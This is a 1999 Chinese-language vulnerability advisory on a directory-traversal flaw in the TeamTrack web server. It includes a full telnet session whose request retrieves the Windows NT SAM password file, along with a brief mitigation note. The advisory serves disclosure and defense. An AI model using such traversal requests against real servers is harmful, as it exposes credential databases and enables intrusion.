绿盟安全月刊->第2期->最新漏洞 TeamTrack web server 易遭受“点点点”攻击

日期：1999-10-15


概述：
    TeamTrack 是一个WEB问题跟踪系统，可以基于WEB来管理此系统。很多Web Server现在仍旧存在“点点点”漏洞，当通过WEB来访问TeamTrack 的时候，可能遭受“点点点”攻击，而暴露此服务器的本地驱动器上的文件。

漏洞描述：

检验漏洞过程:

$ telnet example.com 80
Trying 1.2.3.4...
Connected to example.com.
Escape character is '^]'.
GET /../../../../../winnt/repair/sam._ HTTP/1.0

HTTP/1.0 200 OK
Server: TeamTrack/3.00(3097)
Date: Sat, 02 Oct 1999 04:40:30 GMT
Last-Modified: Sat, 02 Oct 1999 04:40:30 GMT
Accept-Ranges: bytes
Last-Modified: Thu, 29 Jul 1999 03:43:10 GMT
Content-Length: 3330
Content-Type: text/html

,IP?f $$hive$$.tm}h眳.
Connection closed by foreign host.

在这个例子中被取回的文件是 SAM文件 -Windows NT 的存放密码的数据库文件。
当此请求被作为服务来运行，他可以访问系统的任何文件。

解决方法：
    TeamTrack 能使用 IIS或者 Netscape Web Server来配置。使用这些商业的WEB
Server来管理 TeamTrack's 的存取也许是个好方法。


补充：
此产品的网址：http://www.teamtrack.com/product/